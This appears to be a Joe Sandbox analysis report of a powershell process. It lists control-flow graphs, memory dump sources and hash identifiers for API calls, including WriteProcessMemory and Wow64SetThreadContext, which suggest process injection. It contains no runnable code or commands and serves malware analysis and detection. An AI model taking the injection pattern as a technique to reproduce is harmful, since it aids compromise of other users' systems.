
                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1011 74be480-74be4de 1013 74be4e0-74be4ea 1011->1013 1014 74be517-74be579 CreateFileA 1011->1014 1013->1014 1015 74be4ec-74be4ee 1013->1015 1023 74be57b-74be581 1014->1023 1024 74be582-74be5c2 1014->1024 1016 74be511-74be514 1015->1016 1017 74be4f0-74be4fa 1015->1017 1016->1014 1019 74be4fe-74be50d 1017->1019 1020 74be4fc 1017->1020 1019->1019 1021 74be50f 1019->1021 1020->1019 1021->1016 1023->1024 1029 74be5d2 1024->1029 1030 74be5c4-74be5c8 1024->1030 1032 74be5d3 1029->1032 1030->1029 1031 74be5ca 1030->1031 1031->1029 1032->1032
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 074BE569
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: b803f5ea7eef4bffd1b383db42770527ac6708eeb30bfca3f89faf379d61237e
                                                                                                              • Instruction ID: 11d09c6c736b8c6baeaa52218c48c74d2c0f1a8f3ec0a94533d2cae0e32fd1ce
                                                                                                              • Opcode Fuzzy Hash: b803f5ea7eef4bffd1b383db42770527ac6708eeb30bfca3f89faf379d61237e
                                                                                                              • Instruction Fuzzy Hash: FD4156B1C00269DFDB20CFA9C981BDEBBB1AF88710F14852AE815A6250DBB59851CF91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1033 74be878-74be8d9 1035 74be8db-74be8e5 1033->1035 1036 74be912-74be96f CreateFileMappingA 1033->1036 1035->1036 1037 74be8e7-74be8e9 1035->1037 1045 74be978-74be9b8 1036->1045 1046 74be971-74be977 1036->1046 1038 74be8eb-74be8f5 1037->1038 1039 74be90c-74be90f 1037->1039 1041 74be8f9-74be908 1038->1041 1042 74be8f7 1038->1042 1039->1036 1041->1041 1044 74be90a 1041->1044 1042->1041 1044->1039 1051 74be9ba-74be9be 1045->1051 1052 74be9c8 1045->1052 1046->1045 1051->1052 1053 74be9c0 1051->1053 1054 74be9c9 1052->1054 1053->1052 1054->1054
                                                                                                              APIs
                                                                                                              • CreateFileMappingA.KERNEL32(?,?,?,?,?,?), ref: 074BE95F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFileMapping
                                                                                                              • String ID:
                                                                                                              • API String ID: 524692379-0
                                                                                                              • Opcode ID: 617a678000b7a9ef6c4fb50935f6c390a241a5270edf2ea207d952870b3b1afa
                                                                                                              • Instruction ID: 43b072845ac3180826133787bb5ef02fa43b0be9f543b08915edc334b51904fe
                                                                                                              • Opcode Fuzzy Hash: 617a678000b7a9ef6c4fb50935f6c390a241a5270edf2ea207d952870b3b1afa
                                                                                                              • Instruction Fuzzy Hash: 414177B1C00369DFEB20DFA9C8817DEBBF1BF89310F14852AE814A7240DBB59845CB91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1055 30802d8-308032e 1058 308033e-308037d WriteProcessMemory 1055->1058 1059 3080330-308033c 1055->1059 1061 308037f-3080385 1058->1061 1062 3080386-30803b6 1058->1062 1059->1058 1061->1062
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 03080370
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467046119.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3080000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 56d6760088c4c4c54057612fd307b4223a892445d72eb27d2cf169ac8a1cb709
                                                                                                              • Instruction ID: 480273fd94dea81f2b7d9d370a7a86af9e2d4862160f4230071d4eca5ad21a06
                                                                                                              • Opcode Fuzzy Hash: 56d6760088c4c4c54057612fd307b4223a892445d72eb27d2cf169ac8a1cb709
                                                                                                              • Instruction Fuzzy Hash: DF214B759013499FDF10DFA9C881BEEBBF4FF48320F148429E958A7250C7789554CBA4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1066 30802e0-308032e 1068 308033e-308037d WriteProcessMemory 1066->1068 1069 3080330-308033c 1066->1069 1071 308037f-3080385 1068->1071 1072 3080386-30803b6 1068->1072 1069->1068 1071->1072
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 03080370
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467046119.0000000003080000.00000040.00000800.00020000.00000000.sdmp, Offset: 03080000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3080000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: cda5d58a9fbcf5c01c282dcf664f404e61880631a441e83c87c797bf49483b83
                                                                                                              • Instruction ID: a08d85685a9760b9a1137b67c819f8b46b97908294802ade1dcd668be52ef62b
                                                                                                              • Opcode Fuzzy Hash: cda5d58a9fbcf5c01c282dcf664f404e61880631a441e83c87c797bf49483b83
                                                                                                              • Instruction Fuzzy Hash: E02127719013499FDF10DFA9C885BDEBBF5FF48320F148429E958A7250C7789954CBA4

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1076 309fd88-309fddb 1079 309fdeb-309fe1b Wow64SetThreadContext 1076->1079 1080 309fddd-309fde9 1076->1080 1082 309fe1d-309fe23 1079->1082 1083 309fe24-309fe54 1079->1083 1080->1079 1082->1083
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0309FE0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467074571.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3090000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 9d15afa5d464857cee7cc59331333aab41f324247a2c15f21ad2bb3a723bdde1
                                                                                                              • Instruction ID: 0020ebf136258d963144a4fdc9288f554f28d3e504e20771ed7d769793e613e0
                                                                                                              • Opcode Fuzzy Hash: 9d15afa5d464857cee7cc59331333aab41f324247a2c15f21ad2bb3a723bdde1
                                                                                                              • Instruction Fuzzy Hash: 89213E719003099FEB10CFAAD4457EEBBF4EF48324F14842AD519A7240D778A944CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1087 309fd90-309fddb 1089 309fdeb-309fe1b Wow64SetThreadContext 1087->1089 1090 309fddd-309fde9 1087->1090 1092 309fe1d-309fe23 1089->1092 1093 309fe24-309fe54 1089->1093 1090->1089 1092->1093
                                                                                                              APIs
                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0309FE0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3467074571.0000000003090000.00000040.00000800.00020000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3090000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThreadWow64
                                                                                                              • String ID:
                                                                                                              • API String ID: 983334009-0
                                                                                                              • Opcode ID: 59c0a88eb74eecd351b53a47940a0101b5de7c1d100b346a0267f047f8c42fb9
                                                                                                              • Instruction ID: 50c7f726b73f46c9e5d40f1274576da6c34367a02939370eedc26f2642d3eeee
                                                                                                              • Opcode Fuzzy Hash: 59c0a88eb74eecd351b53a47940a0101b5de7c1d100b346a0267f047f8c42fb9
                                                                                                              • Instruction Fuzzy Hash: 422138719003098FEB10CFAAC4857EEBBF4EF88324F14842AD519A7240DB78A944CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1097 7156d50-7156da1 1099 7156db1-7156dea WriteProcessMemory 1097->1099 1100 7156da3-7156daf 1097->1100 1101 7156df3-7156e07 1099->1101 1102 7156dec-7156df2 1099->1102 1100->1099 1102->1101
                                                                                                              APIs
                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,00000001), ref: 07156DDD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3503039093.0000000007150000.00000040.00000800.00020000.00000000.sdmp, Offset: 07150000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7150000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MemoryProcessWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3559483778-0
                                                                                                              • Opcode ID: 8dfaccbcd35072036a64806d6eb45061ab07c935973d29a95156028a840e5087
                                                                                                              • Instruction ID: 711f2fc62b36bd32c8b0da5d1979569aeaa6b31160d5720ad4fae8591467a12e
                                                                                                              • Opcode Fuzzy Hash: 8dfaccbcd35072036a64806d6eb45061ab07c935973d29a95156028a840e5087
                                                                                                              • Instruction Fuzzy Hash: 3D21E0B5900359DFCB14CF9AD984BDEBBF4FB48710F10842AE918A7250D7B4A950CFA0
                                                                                                              APIs
                                                                                                              • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 074BEC4E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileView
                                                                                                              • String ID:
                                                                                                              • API String ID: 3314676101-0
                                                                                                              • Opcode ID: 45fc04a38c455437f989fb523f7b1a5c432722db7776d95cbd97c22a0e38c71b
                                                                                                              • Instruction ID: 58443c593eb83a4991692dd04e8ce8871aff06e4512023e02e13c3fade8a2a3b
                                                                                                              • Opcode Fuzzy Hash: 45fc04a38c455437f989fb523f7b1a5c432722db7776d95cbd97c22a0e38c71b
                                                                                                              • Instruction Fuzzy Hash: FA1147728003499FDB20CFAAC845BEFBFF5EF88320F14841AE519A7210CB759950CBA1
                                                                                                              APIs
                                                                                                              • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 074BEC4E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3509483100.00000000074B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileView
                                                                                                              • String ID:
                                                                                                              • API String ID: 3314676101-0
                                                                                                              • Opcode ID: 5bf19c2bf8255f862d88291f111d111b8f675652bcfbf4e1049d0b4cca0c9441
                                                                                                              • Instruction ID: 788c6bf8af24aadc777127c5d3de18bd0ece3dcb79d1d881413907b529f61f46
                                                                                                              • Opcode Fuzzy Hash: 5bf19c2bf8255f862d88291f111d111b8f675652bcfbf4e1049d0b4cca0c9441
                                                                                                              • Instruction Fuzzy Hash: B21129728003499FDB10DFAAC945BDFBBF5EF88324F148419E519A7250C7759950CFA1
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3516284452.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_8620000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: K,
                                                                                                              • API String ID: 0-3311693489
                                                                                                              • Opcode ID: 8216cf65a205094a16996136ce5ea36e8c0b8f0b65d0d38b50059d4079cc0982
                                                                                                              • Instruction ID: 4cc6e885a0a87b90a71301b98da751c3e1b1ede94ca99508f020d99701d2d673
                                                                                                              • Opcode Fuzzy Hash: 8216cf65a205094a16996136ce5ea36e8c0b8f0b65d0d38b50059d4079cc0982
                                                                                                              • Instruction Fuzzy Hash: 82A1AC74B01715DFDB04DFA4DA55AADBBB2EF88302F1180A9E411AB3A1CB399E41CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3510177904.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_74c0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: I
                                                                                                              • API String ID: 0-3707901625
                                                                                                              • Opcode ID: be56bbbd9abe50c87b5f33ebcf11f59c29b23bddf1796f0401b8c18ebcef86ff
                                                                                                              • Instruction ID: 7f51b5426a997f857d9ace4632cf72ba298f7b3a6d6aeed99feb223b96cc213a
                                                                                                              • Opcode Fuzzy Hash: be56bbbd9abe50c87b5f33ebcf11f59c29b23bddf1796f0401b8c18ebcef86ff
                                                                                                              • Instruction Fuzzy Hash: 6BF0E2B4A04229DFDBA5CF24D9887DAB7B1FB86316F0045EAD00DA6290C7784EC5CF02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3504678151.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0087189159f17b56d93e0faa55760a6af0b2e5dc6d50c729c3f8ffe3b11e2ec2
                                                                                                              • Instruction ID: d8cc36fc93b12e7d2edcf35a6380ee04fd158417e7b9c29ced0c4551a33c9d70
                                                                                                              • Opcode Fuzzy Hash: 0087189159f17b56d93e0faa55760a6af0b2e5dc6d50c729c3f8ffe3b11e2ec2
                                                                                                              • Instruction Fuzzy Hash: EAC240B4A00215DFEB24DB54C950B99B7B2EF89304F15C1E9EA09AB341CB71ED82CF95
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3504678151.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c59b1307a7660bf4f9a66285eeea3dea66ba30eebb1a2e9b7ec4815661c31c5c
                                                                                                              • Instruction ID: 2e7ebc64ca18db7fdac44e96264fd281ce4f57a4a4fddd05afb6945e1585a9bd
                                                                                                              • Opcode Fuzzy Hash: c59b1307a7660bf4f9a66285eeea3dea66ba30eebb1a2e9b7ec4815661c31c5c
                                                                                                              • Instruction Fuzzy Hash: 9B7252B4A0021ADFEF18CB68C950B5EBBB2FF85304F5481A9D509AB351DB71ED81CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 77b43d571cc4915d210a171e02d1d598659033e038afcc720e6270b9ae22b72e
                                                                                                              • Instruction ID: e14b24409dd1ebbcc360493d13508709fb556a24e6b3cd9f89f8df162a200f22
                                                                                                              • Opcode Fuzzy Hash: 77b43d571cc4915d210a171e02d1d598659033e038afcc720e6270b9ae22b72e
                                                                                                              • Instruction Fuzzy Hash: 85725A74B00215DFEB64CB58C854B59B7B2BF85318F15C0A9E909AB352CB72ED81CF92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4842c3bc85a7de3852b68633f4d12021ad1d16c95d4cbe562825b96a41bd161a
                                                                                                              • Instruction ID: 7e99248399075b86bef835260446a135d66b42aaf4a83054beaac660ae23d478
                                                                                                              • Opcode Fuzzy Hash: 4842c3bc85a7de3852b68633f4d12021ad1d16c95d4cbe562825b96a41bd161a
                                                                                                              • Instruction Fuzzy Hash: 1D3239B170120AEFDB248F68D8447AA7BB6EFC5318F1C84AAD6058B291DB71DC51C7E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3468632278.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3250000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: db5c7c66be29959f0f0add3771af06706161a6515e6bdf596aae25b3be20cfde
                                                                                                              • Instruction ID: d4077786f28244538589bcaa91ec75d1f6e8cf878a4b75186e7c21480c75e85b
                                                                                                              • Opcode Fuzzy Hash: db5c7c66be29959f0f0add3771af06706161a6515e6bdf596aae25b3be20cfde
                                                                                                              • Instruction Fuzzy Hash: 1A328F75A05245DFCB05CF68D590A9EBFB1FF89310F19819AE844AB362C730ED86CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 57fdaadaabe34165bf59afcd2e803ea9dfceea53511d906aa8d81868a6683057
                                                                                                              • Instruction ID: b6e8c4b60b625b478b130f742def29bcff2dcf3d449e8fddb4bbca3dc101b325
                                                                                                              • Opcode Fuzzy Hash: 57fdaadaabe34165bf59afcd2e803ea9dfceea53511d906aa8d81868a6683057
                                                                                                              • Instruction Fuzzy Hash: B11229B1B06346AFDB158B78981076ABBA5AFC2218F1484ABD545CF392EF71C841C7D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 128a7e1fc670b788744b929ebd53d61eaea91067593381189cfce16eaa58692d
                                                                                                              • Instruction ID: 9edc5c1d831673d4eb8d981e5f7e9e8afa29fa322dee488ecd56b47bfda45f9f
                                                                                                              • Opcode Fuzzy Hash: 128a7e1fc670b788744b929ebd53d61eaea91067593381189cfce16eaa58692d
                                                                                                              • Instruction Fuzzy Hash: 01425974B00215DFEB64CB18C854B59B7B2BF85718F15C0A9E909AB352CB72ED81CF92
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c8e63fe2b43db0bb1f6ed5b0c8cb3f48dbf34c94eb418556936e6e3c7d9b3825
                                                                                                              • Instruction ID: c2c9f03de71062e16e0c389ac79a3a1e6d28715fcb6b87556d9ec5de0df19f76
                                                                                                              • Opcode Fuzzy Hash: c8e63fe2b43db0bb1f6ed5b0c8cb3f48dbf34c94eb418556936e6e3c7d9b3825
                                                                                                              • Instruction Fuzzy Hash: 8EE125F2B05316EFDB148B6CD81076ABBAAAFC5218F24847AD505CB241FB72D941C7E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29a98a6576b43c25b23156559deca64dfd5c94582ad202a1be56e4c2841a7b9b
                                                                                                              • Instruction ID: 3f2e28fd5173ff460bd5a64793541816a43a6f14df07cb29ba816880e3380724
                                                                                                              • Opcode Fuzzy Hash: 29a98a6576b43c25b23156559deca64dfd5c94582ad202a1be56e4c2841a7b9b
                                                                                                              • Instruction Fuzzy Hash: 0C125BB4A01205EFDB14CB98C855E6DBBB6EFC5708F15C469E909AB351CB72EC42CB81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e365ad0058263f08e6886e42755e93e4cf3d76037bc91ecb77f24db192b92492
                                                                                                              • Instruction ID: faec1a55013c42db863c1fe82410a153eb52235f0f11d5301b2922c7cc2e79d8
                                                                                                              • Opcode Fuzzy Hash: e365ad0058263f08e6886e42755e93e4cf3d76037bc91ecb77f24db192b92492
                                                                                                              • Instruction Fuzzy Hash: 4D127DB4B02205EFDB24CB94C841E69B7B6EFC5718F15C469E819AB351C772EC42CB81
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3504678151.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_7390000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d9057e91cd590ac864626ac67c76c240b13f140713760879f7044cf46be5227c
                                                                                                              • Instruction ID: 67892b0678eeff9a34aef30f7893fa897d7b64200acf215b2e40a431a6245ec0
                                                                                                              • Opcode Fuzzy Hash: d9057e91cd590ac864626ac67c76c240b13f140713760879f7044cf46be5227c
                                                                                                              • Instruction Fuzzy Hash: D8D127B1B0421ACFEF248F69D8447AABBA6FFC5210F1480BED51D8B291DB71E851C791
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9fd408740cf2c4bdf7127afe319ea5c8bce5614f0a2a55d68832df32cea9341c
                                                                                                              • Instruction ID: 04d9a5b3e0ec271de1780d3af9b32cb33048fe560dda01e797354ef59805318f
                                                                                                              • Opcode Fuzzy Hash: 9fd408740cf2c4bdf7127afe319ea5c8bce5614f0a2a55d68832df32cea9341c
                                                                                                              • Instruction Fuzzy Hash: 6CD104B1B01206EFEB289B68D84066ABBFAEFC5218F24C46AD5158B351DF71DC42C7D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3513661407.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_79a0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 05b22e114f01038126cb1fc5da6708477fef65eeda7653aacbc5b16fe733ad60
                                                                                                              • Instruction ID: 1d947b88d4647dd39c04192a1d471f0e3edd260cc26499c2b99c880925b33eee
                                                                                                              • Opcode Fuzzy Hash: 05b22e114f01038126cb1fc5da6708477fef65eeda7653aacbc5b16fe733ad60
                                                                                                              • Instruction Fuzzy Hash: 2EA16EB1B01216AFDB258BA8D80176ABFE6EFC6218F1484AAD545DF341DB71CC01C3E2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3468632278.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3250000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 719b05d1af8f2d0ff011d8f9300c559b62631fe396549eee2390676c08e40983
                                                                                                              • Instruction ID: e3ece8fb1c1e5bbab7b97950f214f3af6866d3e4c5059c9d9909de2734f15cf0
                                                                                                              • Opcode Fuzzy Hash: 719b05d1af8f2d0ff011d8f9300c559b62631fe396549eee2390676c08e40983
                                                                                                              • Instruction Fuzzy Hash: B0D1F834A10209DFDB15CFA8D484A9DBBF6BF89310F288159F805AB361CB75ED81CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3468632278.0000000003250000.00000040.00000800.00020000.00000000.sdmp, Offset: 03250000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_3250000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e9a3f56957897275590e016f6ad524d6b7b977659147a0c868a70058ac3fe592
                                                                                                              • Instruction ID: 40b8d439d40f9a94b21e9e79b97351c22f0b011f94c76d9330e249755364d338
                                                                                                              • Opcode Fuzzy Hash: e9a3f56957897275590e016f6ad524d6b7b977659147a0c868a70058ac3fe592
                                                                                                              • Instruction Fuzzy Hash: E6915A74A00245CFCB06CF59C494AAEFBB5FF88310B258699D915AB3A5C731FD91CBA0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3516284452.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_8620000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: bf0c3f418e2f2946e12e33a1483ac4244a98582c458baf5b212751fc236d1180
                                                                                                              • Instruction ID: 458ae898e5593f1107e5c1ff1e84907ffbddd735098e90639bc0622d96d096cd
                                                                                                              • Opcode Fuzzy Hash: bf0c3f418e2f2946e12e33a1483ac4244a98582c458baf5b212751fc236d1180
                                                                                                              • Instruction Fuzzy Hash: 3F51EF34700711CFE769AB74D41866EB7B6AFCA301B1148ADD4468B3A1DF35EC02CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.3516284452.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_8620000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: eea28d68e7630d867f2b04cd2b1889b6212497d6c9232b34329a3dac0883ff95
                                                                                                              • Instruction ID: fce1e033066abd8973847b1502d25c78e4116b06e34dde4ceffc5c4913415ee0
                                                                                                              • Opcode Fuzzy Hash: eea28d68e7630d867f2b04cd2b1889b6212497d6c9232b34329a3dac0883ff95
                                                                                                              • Instruction Fuzzy Hash: 58511535A00626CFC711DF68D49096AFBB5FF89321B16829AE5199B341C730FC52CBD5
                                                                                                              Memory Dump Source
